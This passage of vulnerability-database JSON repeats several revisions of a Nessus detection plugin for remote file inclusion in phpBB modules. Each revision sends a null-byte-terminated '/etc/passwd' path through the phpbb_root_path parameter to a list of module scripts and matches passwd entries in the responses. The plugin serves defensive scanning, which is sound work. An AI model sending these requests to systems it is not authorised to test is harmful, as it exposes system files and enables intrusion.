\"/language/lang_german/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_german/lang_admin_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_admin_album.php\";\n# - PlusXL 
itself\nmod[nmods++] = \"/includes/functions.php\";\n# - SpamBlockerMod\nmod[nmods++] = \"/includes/antispam.php\";\n\n\ninfo = \"\";\ncontents = \"\";\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/phpBB\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n dir = matches[2];\n\n # Try to exploit the flaw to read a file.\n file = \"/etc/passwd%00\";\n for (i=0; i<nmods; i++)\n {\n r = http_send_recv3(method:\"GET\", \n item:string(\n dir, mod[i], \"?\",\n \"phpbb_root_path=\", file\n ), \n port:port\n );\n if (isnull(r)) exit(0);\n res = r[2];\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"main\\(/etc/passwd\\\\0.+ failed to open stream\", string:res) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"main\\(/etc/passwd\\).*: failed to open stream: No such file or directory\", string:res) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. 
File\\(/etc/passwd\", string:res)\n )\n {\n info = info +\n \" \" + dir + mod[i] + '\\n';\n\n if (!contents && egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n contents = res - strstr(res, \"<br\");\n\n if (!thorough_tests) break;\n }\n }\n}\n\nif (info)\n{\n if (contents)\n {\n contents = data_protection::redact_etc_passwd(output:contents);\n info = string(\n info,\n \"\\n\",\n \"And here are the contents of the file '/etc/passwd' that Nessus\\n\",\n \"was able to read from the remote host :\\n\",\n \"\\n\",\n contents\n );\n }\n report = string(\n \"The following scripts(s) are vulnerable :\\n\",\n \"\\n\",\n info\n );\n\n security_warning(port:port, extra:report);\n}\n", "title": "phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 7, "lastseen": "2018-08-30T19:49:30"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:phpbb_group:phpbb-auction"], "cvelist": ["CVE-2006-7090", "CVE-2006-5301", "CVE-2006-5418", "CVE-2006-7100", "CVE-2007-5009", "CVE-2006-5390", "CVE-2006-7147", "CVE-2006-2245", "CVE-2007-5100", "CVE-2006-5306"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the remote host fails to sanitize input to the 'phpbb_root_path' parameter before using it to include PHP code. 
Provided PHP's 'register_globals' setting is enabled, an unauthenticated attacker may be able to exploit these flaws to view arbitrary files on the remote host or to execute arbitrary PHP code, possibly taken from third-party hosts.", "edition": 9, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "6128dc18f146eb2143c7331c8f8dee39de611afadcd80cec7f7a20608d971c33", "hashmap": [{"hash": "cd1acb6332b705efcfb274e39bdce0d5", "key": "title"}, {"hash": "4d9c49a2a6a3144a40f9c20b01976545", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "eb7c1eabb2baa803f2635d2ba4792d3f", "key": "pluginID"}, {"hash": "015cb78ce50d3bd4e2fbe18f25603329", "key": "modified"}, {"hash": "69db04a1c80dd4a176e4f3d53561e805", "key": "cvelist"}, {"hash": "b8ec7988b9627a83f1d82122e582413e", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "8b5dc20b319b47100bd63d45b155e50c", "key": "published"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "f850038f28a9086139708577a2889260", "key": "sourceData"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "65920404be9df979f281f296ff035289", "key": "cpe"}, {"hash": "9acce4448de96d820472fbc896512e35", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=21323", "id": "PHPBB_AUCTION_PHPBB_ROOT_PATH_FILE_INCLUDE.NASL", "lastseen": "2018-11-17T03:07:38", "modified": "2018-11-15T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "21323", "published": "2006-05-04T00:00:00", "references": ["https://www.phpbb.com/community/viewtopic.php?p=2504370&highlight=#2504370", "https://seclists.org/bugtraq/2006/Oct/209", "http://www.nessus.org/u?9640ab6a", "https://www.securityfocus.com/archive/1/452012/30/0/threaded", "https://www.securityfocus.com/archive/1/479997/30/0/threaded", 
"http://www.nessus.org/u?37fd2995"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21323);\n script_version(\"1.40\");\n\n script_cve_id(\n \"CVE-2006-2245\",\n \"CVE-2006-5301\",\n \"CVE-2006-5306\",\n \"CVE-2006-5390\",\n \"CVE-2006-5418\",\n \"CVE-2006-7090\",\n \"CVE-2006-7100\",\n \"CVE-2006-7147\",\n \"CVE-2007-5009\",\n \"CVE-2007-5100\"\n );\n script_bugtraq_id(\n 17822, \n 20484, \n 20485, \n 20493, \n 20501, \n 20518, \n 20525, \n 20558, \n 20571, \n 21171, \n 25737, \n 25776\n );\n script_xref(name:\"EDB-ID\", value:\"2483\");\n script_xref(name:\"EDB-ID\", value:\"2522\");\n script_xref(name:\"EDB-ID\", value:\"2525\");\n script_xref(name:\"EDB-ID\", value:\"2533\");\n script_xref(name:\"EDB-ID\", value:\"2538\");\n\n script_name(english:\"phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion\");\n script_summary(english:\"Tries to read a local file using phpBB modules\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is prone to\nremote file include attacks.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the\nremote host fails to sanitize input to the 'phpbb_root_path' parameter\nbefore using it to include PHP code. 
Provided PHP's\n'register_globals' setting is enabled, an unauthenticated attacker may\nbe able to exploit these flaws to view arbitrary files on the remote\nhost or to execute arbitrary PHP code, possibly taken from third-party\nhosts.\" );\n # http://web.archive.org/web/20070527141033/http://pridels.blogspot.com/2006/05/phpbb-auction-mod-remote-file.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9640ab6a\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2006/Oct/209\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.phpbb.com/community/viewtopic.php?p=2504370&highlight=#2504370\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/452012/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/479997/30/0/threaded\" );\n # https://web.archive.org/web/20160820141912/http://www.phpbb2.de/ftopic45218.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?37fd2995\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Disable PHP's 'register_globals' setting or contact the product's\nauthor to see if an upgrade exists.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/05/04\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/05/03\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n 
script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:phpbb_group:phpbb-auction\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"phpbb_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/phpBB\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Vulnerable scripts.\n# - modules\nnmods = 0;\nmod = make_array();\n# - ACP User Registration\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Admin User Viewed Posts Tracker\nmod[nmods++] = \"/includes/functions_user_viewed_posts.php\";\n# - AI chat (included in PlusXL)\nmod[nmods++] = \"/mods/iai/includes/constants.php\";\n# - Import Tools - Members\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Insert User\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Journals System\nmod[nmods++] = \"/includes/journals_delete.php\";\nmod[nmods++] = \"/includes/journals_edit.php\";\nmod[nmods++] = \"/includes/journals_post.php\";\n# - phpBB auction\nmod[nmods++] = \"/auction/auction_common.php\";\n# - phpBB Search Engine Indexer\nmod[nmods++] = \"/includes/archive/archive_topic.php\";\n# - phpBB Security\nmod[nmods++] = \"/includes/phpbb_security.php\";\n# - phpBB2 Plus (not really a mod)\nmod[nmods++] = \"/language/lang_german/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_german/lang_admin_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_admin_album.php\";\n# - PlusXL 
itself\nmod[nmods++] = \"/includes/functions.php\";\n# - SpamBlockerMod\nmod[nmods++] = \"/includes/antispam.php\";\n\n\ninfo = \"\";\ncontents = \"\";\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/phpBB\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n dir = matches[2];\n\n # Try to exploit the flaw to read a file.\n file = \"/etc/passwd%00\";\n for (i=0; i<nmods; i++)\n {\n r = http_send_recv3(method:\"GET\", \n item:string(\n dir, mod[i], \"?\",\n \"phpbb_root_path=\", file\n ), \n port:port\n );\n if (isnull(r)) exit(0);\n res = r[2];\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"main\\(/etc/passwd\\\\0.+ failed to open stream\", string:res) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"main\\(/etc/passwd\\).*: failed to open stream: No such file or directory\", string:res) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. 
File\\(/etc/passwd\", string:res)\n )\n {\n info = info +\n \" \" + dir + mod[i] + '\\n';\n\n if (!contents && egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n contents = res - strstr(res, \"<br\");\n\n if (!thorough_tests) break;\n }\n }\n}\n\nif (info)\n{\n if (contents)\n {\n contents = data_protection::redact_etc_passwd(output:contents);\n info = string(\n info,\n \"\\n\",\n \"And here are the contents of the file '/etc/passwd' that Nessus\\n\",\n \"was able to read from the remote host :\\n\",\n \"\\n\",\n contents\n );\n }\n report = string(\n \"The following scripts(s) are vulnerable :\\n\",\n \"\\n\",\n info\n );\n\n security_warning(port:port, extra:report);\n}\n", "title": "phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 9, "lastseen": "2018-11-17T03:07:38"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2006-7090", "CVE-2006-5301", "CVE-2006-5418", "CVE-2006-7100", "CVE-2007-5009", "CVE-2006-5390", "CVE-2006-7147", "CVE-2006-2245", "CVE-2007-5100", "CVE-2006-5306"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the remote host fails to sanitize input to the 'phpbb_root_path' parameter before using it to include PHP code. 
Provided PHP's 'register_globals' setting is enabled, an unauthenticated attacker may be able to exploit these flaws to view arbitrary files on the remote host or to execute arbitrary PHP code, possibly taken from third-party hosts.", "edition": 3, "enchantments": {}, "hash": "e9e3415408c507c545c811ac0c731f266b973e06158d3baf50bfa5f941a3b35e", "hashmap": [{"hash": "cd1acb6332b705efcfb274e39bdce0d5", "key": "title"}, {"hash": "fed7aede4a5f01a9fc080184a2dd8da8", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "eb7c1eabb2baa803f2635d2ba4792d3f", "key": "pluginID"}, {"hash": "69db04a1c80dd4a176e4f3d53561e805", "key": "cvelist"}, {"hash": "b8ec7988b9627a83f1d82122e582413e", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "8b5dc20b319b47100bd63d45b155e50c", "key": "published"}, {"hash": "64dc5d9d713f988fa1649531a8cbae65", "key": "sourceData"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "b672439e0dc96035c3e68e00611bd548", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "9acce4448de96d820472fbc896512e35", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=21323", "id": "PHPBB_AUCTION_PHPBB_ROOT_PATH_FILE_INCLUDE.NASL", "lastseen": "2017-04-26T00:46:11", "modified": "2017-04-25T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.2", "pluginID": "21323", "published": "2006-05-04T00:00:00", "references": ["http://www.securityfocus.com/archive/1/479997/30/0/threaded", "http://www.nessus.org/u?9640ab6a", "http://www.phpbb.com/phpBB/viewtopic.php?p=2504370&highlight=#2504370", "http://www.nessus.org/u?37fd2995", "http://seclists.org/bugtraq/2006/Oct/209", "http://www.securityfocus.com/archive/1/452012/30/0/threaded"], "reporter": 
"Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21323);\n script_version(\"$Revision: 1.37 $\");\n\n script_cve_id(\n \"CVE-2006-2245\",\n \"CVE-2006-5301\",\n \"CVE-2006-5306\",\n \"CVE-2006-5390\",\n \"CVE-2006-5418\",\n \"CVE-2006-7090\",\n \"CVE-2006-7100\",\n \"CVE-2006-7147\",\n \"CVE-2007-5009\",\n \"CVE-2007-5100\"\n );\n script_bugtraq_id(\n 17822, \n 20484, \n 20485, \n 20493, \n 20501, \n 20518, \n 20525, \n 20558, \n 20571, \n 21171, \n 25737, \n 25776\n );\n script_osvdb_id(\n 25263,\n 29711,\n 29712,\n 29713,\n 29714,\n 29734,\n 29751,\n 31029,\n 35449,\n 35450,\n 38265,\n 38723,\n 38724,\n 38725\n );\n script_xref(name:\"EDB-ID\", value:\"2483\");\n script_xref(name:\"EDB-ID\", value:\"2522\");\n script_xref(name:\"EDB-ID\", value:\"2525\");\n script_xref(name:\"EDB-ID\", value:\"2533\");\n script_xref(name:\"EDB-ID\", value:\"2538\");\n\n script_name(english:\"phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion\");\n script_summary(english:\"Tries to read a local file using phpBB modules\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is prone to\nremote file include attacks.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the\nremote host fails to sanitize input to the 'phpbb_root_path' parameter\nbefore using it to include PHP code. 
Provided PHP's\n'register_globals' setting is enabled, an unauthenticated attacker may\nbe able to exploit these flaws to view arbitrary files on the remote\nhost or to execute arbitrary PHP code, possibly taken from third-party\nhosts.\" );\n # http://web.archive.org/web/20070527141033/http://pridels.blogspot.com/2006/05/phpbb-auction-mod-remote-file.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9640ab6a\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/bugtraq/2006/Oct/209\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpbb.com/phpBB/viewtopic.php?p=2504370&highlight=#2504370\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/452012/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/479997/30/0/threaded\" );\n # https://web.archive.org/web/20160820141912/http://www.phpbb2.de/ftopic45218.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?37fd2995\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Disable PHP's 'register_globals' setting or contact the product's\nauthor to see if an upgrade exists.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/05/04\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/05/03\");\n script_cvs_date(\"$Date: 2017/04/25 14:31:38 $\");\n 
script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:phpbb_group:phpbb-auction\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2017 Tenable Network Security, Inc.\");\n\n script_dependencies(\"phpbb_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/phpBB\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Vulnerable scripts.\n# - modules\nnmods = 0;\nmod = make_array();\n# - ACP User Registration\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Admin User Viewed Posts Tracker\nmod[nmods++] = \"/includes/functions_user_viewed_posts.php\";\n# - AI chat (included in PlusXL)\nmod[nmods++] = \"/mods/iai/includes/constants.php\";\n# - Import Tools - Members\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Insert User\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Journals System\nmod[nmods++] = \"/includes/journals_delete.php\";\nmod[nmods++] = \"/includes/journals_edit.php\";\nmod[nmods++] = \"/includes/journals_post.php\";\n# - phpBB auction\nmod[nmods++] = \"/auction/auction_common.php\";\n# - phpBB Search Engine Indexer\nmod[nmods++] = \"/includes/archive/archive_topic.php\";\n# - phpBB Security\nmod[nmods++] = \"/includes/phpbb_security.php\";\n# - phpBB2 Plus (not really a mod)\nmod[nmods++] = \"/language/lang_german/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_german/lang_admin_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_admin_album.php\";\n# - PlusXL itself\nmod[nmods++] = \"/includes/functions.php\";\n# - 
SpamBlockerMod\nmod[nmods++] = \"/includes/antispam.php\";\n\n\ninfo = \"\";\ncontents = \"\";\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/phpBB\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n dir = matches[2];\n\n # Try to exploit the flaw to read a file.\n file = \"/etc/passwd%00\";\n for (i=0; i<nmods; i++)\n {\n r = http_send_recv3(method:\"GET\", \n item:string(\n dir, mod[i], \"?\",\n \"phpbb_root_path=\", file\n ), \n port:port\n );\n if (isnull(r)) exit(0);\n res = r[2];\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"main\\(/etc/passwd\\\\0.+ failed to open stream\", string:res) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"main\\(/etc/passwd\\).*: failed to open stream: No such file or directory\", string:res) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. 
File\\(/etc/passwd\", string:res)\n )\n {\n info = info +\n \" \" + dir + mod[i] + '\\n';\n\n if (!contents && egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n contents = res - strstr(res, \"<br\");\n\n if (!thorough_tests) break;\n }\n }\n}\n\nif (info)\n{\n if (contents)\n info = string(\n info,\n \"\\n\",\n \"And here are the contents of the file '/etc/passwd' that Nessus\\n\",\n \"was able to read from the remote host :\\n\",\n \"\\n\",\n contents\n );\n\n report = string(\n \"The following scripts(s) are vulnerable :\\n\",\n \"\\n\",\n info\n );\n\n security_warning(port:port, extra:report);\n}\n", "title": "phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion", "type": "nessus", "viewCount": 0}, "differentElements": ["cpe"], "edition": 3, "lastseen": "2017-04-26T00:46:11"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:phpbb_group:phpbb-auction"], "cvelist": ["CVE-2006-7090", "CVE-2006-5301", "CVE-2006-5418", "CVE-2006-7100", "CVE-2007-5009", "CVE-2006-5390", "CVE-2006-7147", "CVE-2006-2245", "CVE-2007-5100", "CVE-2006-5306"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the remote host fails to sanitize input to the 'phpbb_root_path' parameter before using it to include PHP code. 
Provided PHP's 'register_globals' setting is enabled, an unauthenticated attacker may be able to exploit these flaws to view arbitrary files on the remote host or to execute arbitrary PHP code, possibly taken from third-party hosts.", "edition": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "4411c69ee4027049e7f05f5319215f3fd8655802d289f91beb469806b6ac9ea4", "hashmap": [{"hash": "cd1acb6332b705efcfb274e39bdce0d5", "key": "title"}, {"hash": "fed7aede4a5f01a9fc080184a2dd8da8", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "eb7c1eabb2baa803f2635d2ba4792d3f", "key": "pluginID"}, {"hash": "69db04a1c80dd4a176e4f3d53561e805", "key": "cvelist"}, {"hash": "b8ec7988b9627a83f1d82122e582413e", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "8b5dc20b319b47100bd63d45b155e50c", "key": "published"}, {"hash": "64dc5d9d713f988fa1649531a8cbae65", "key": "sourceData"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "b672439e0dc96035c3e68e00611bd548", "key": "modified"}, {"hash": "65920404be9df979f281f296ff035289", "key": "cpe"}, {"hash": "9acce4448de96d820472fbc896512e35", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=21323", "id": "PHPBB_AUCTION_PHPBB_ROOT_PATH_FILE_INCLUDE.NASL", "lastseen": "2017-10-29T13:41:28", "modified": "2017-04-25T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "21323", "published": "2006-05-04T00:00:00", "references": ["http://www.securityfocus.com/archive/1/479997/30/0/threaded", "http://www.nessus.org/u?9640ab6a", "http://www.phpbb.com/phpBB/viewtopic.php?p=2504370&highlight=#2504370", "http://www.nessus.org/u?37fd2995", "http://seclists.org/bugtraq/2006/Oct/209", 
"http://www.securityfocus.com/archive/1/452012/30/0/threaded"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21323);\n script_version(\"$Revision: 1.37 $\");\n\n script_cve_id(\n \"CVE-2006-2245\",\n \"CVE-2006-5301\",\n \"CVE-2006-5306\",\n \"CVE-2006-5390\",\n \"CVE-2006-5418\",\n \"CVE-2006-7090\",\n \"CVE-2006-7100\",\n \"CVE-2006-7147\",\n \"CVE-2007-5009\",\n \"CVE-2007-5100\"\n );\n script_bugtraq_id(\n 17822, \n 20484, \n 20485, \n 20493, \n 20501, \n 20518, \n 20525, \n 20558, \n 20571, \n 21171, \n 25737, \n 25776\n );\n script_osvdb_id(\n 25263,\n 29711,\n 29712,\n 29713,\n 29714,\n 29734,\n 29751,\n 31029,\n 35449,\n 35450,\n 38265,\n 38723,\n 38724,\n 38725\n );\n script_xref(name:\"EDB-ID\", value:\"2483\");\n script_xref(name:\"EDB-ID\", value:\"2522\");\n script_xref(name:\"EDB-ID\", value:\"2525\");\n script_xref(name:\"EDB-ID\", value:\"2533\");\n script_xref(name:\"EDB-ID\", value:\"2538\");\n\n script_name(english:\"phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion\");\n script_summary(english:\"Tries to read a local file using phpBB modules\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is prone to\nremote file include attacks.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the\nremote host fails to sanitize input to the 'phpbb_root_path' parameter\nbefore using it to include PHP code. 
Provided PHP's\n'register_globals' setting is enabled, an unauthenticated attacker may\nbe able to exploit these flaws to view arbitrary files on the remote\nhost or to execute arbitrary PHP code, possibly taken from third-party\nhosts.\" );\n # http://web.archive.org/web/20070527141033/http://pridels.blogspot.com/2006/05/phpbb-auction-mod-remote-file.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9640ab6a\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/bugtraq/2006/Oct/209\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpbb.com/phpBB/viewtopic.php?p=2504370&highlight=#2504370\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/452012/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/479997/30/0/threaded\" );\n # https://web.archive.org/web/20160820141912/http://www.phpbb2.de/ftopic45218.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?37fd2995\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Disable PHP's 'register_globals' setting or contact the product's\nauthor to see if an upgrade exists.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/05/04\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/05/03\");\n script_cvs_date(\"$Date: 2017/04/25 14:31:38 $\");\n 
script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:phpbb_group:phpbb-auction\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2017 Tenable Network Security, Inc.\");\n\n script_dependencies(\"phpbb_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/phpBB\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Vulnerable scripts.\n# - modules\nnmods = 0;\nmod = make_array();\n# - ACP User Registration\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Admin User Viewed Posts Tracker\nmod[nmods++] = 